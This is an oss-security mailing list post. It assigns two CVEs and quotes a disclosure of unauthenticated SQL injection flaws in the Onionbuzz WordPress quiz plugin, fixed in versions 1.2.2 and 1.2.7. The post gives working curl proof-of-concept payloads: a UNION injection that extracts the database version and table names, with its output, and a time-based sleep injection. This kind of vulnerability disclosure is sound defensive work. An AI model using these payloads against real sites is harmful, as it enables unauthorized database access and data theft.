Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Mon, 22 Jul 2019 23:04:25 -0400
From: Eugene Kolo <eugene@...enekolo.com>
To: oss-security@...ts.openwall.com
Subject: Re: Two unauthenticated SQL injection vulnerabilities in Onionbuzz
 WordPress plugin

Assigned CVE-2019-14230 and CVE-2019-14231.

On Sat, Jul 20, 2019 at 6:35 PM Eugene Kolo <eugene@...enekolo.com> wrote:

> Two unauthenticated/unprivileged SQL injection vulnerabilities in the
> Viral Quiz Maker - Onionbuzz WordPress plugin.
>
> Information
> ===========
> Affected Product: Viral Quiz Maker - OnionBuzz WordPress plugin
> Vendor Homepage: Onionbuzz.com
> Vulnerability Type: SQL Injection
> Discoverer: Eugene Kolodenker
> Date: July-20-2019
>
> 1)
>
> Description
> ===========
> Prior to v1.2.2, you could exploit the `points` parameter in the
> `ob_get_results` ajax nopriv handler due to there being no sanitization on
> the points argument. The points parameter is not sanitized prior to be used
> in a SQL query in getResultByPointsTrivia. This allows an
> unauthenticated/unprivileged user to perform a SQL injection attack capable
> of remote code execution and information disclosure.
>
> Proof of Concept (POC)
> ======================
> ```
> curl http://site/wp-admin/admin-ajax.php?action=ob_get_results --data
> "type=get_result&id=1&quiz_type=5&points=1 or 1=0 union all select
> 1,1,version(),table_name,1,1,1,1,1 from information_schema.tables;#"
> ```
>
> And get back:
> ```
> {"quiz_id":1,"points":"1 or 1=0 union all select
> 1,1,version(),table_name,1,1,1,1,1 from
> information_schema.tables;#","title":<DBVERSION>","description":"CHARACTER_SETS","featured_image":"<img
> src=\"1\">","image_caption":"1","is_image":1,"success":1}
> ```
>
>
> 2)
>
> Description
> ===========
> Prior to v1.2.7, you could exploit the `id` parameter in the `set_count`
> ajax nopriv handler due to there being no sanitization on the id argument.
> The id parameter is not sanitized prior to be used in a SQL query in
> saveQuestionVote. This allows an unauthenticated/unprivileged user to
> perform a SQL injection attack capable of remote code execution and
> information disclosure.
>
>
> Proof of Concept (POC)
> ======================
>
> ```
> curl http://site/wp-admin/admin-ajax.php?type=set_count --data
> "action=ob_question_votes&id=1 or sleep(10);#"
> ```
>
>

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.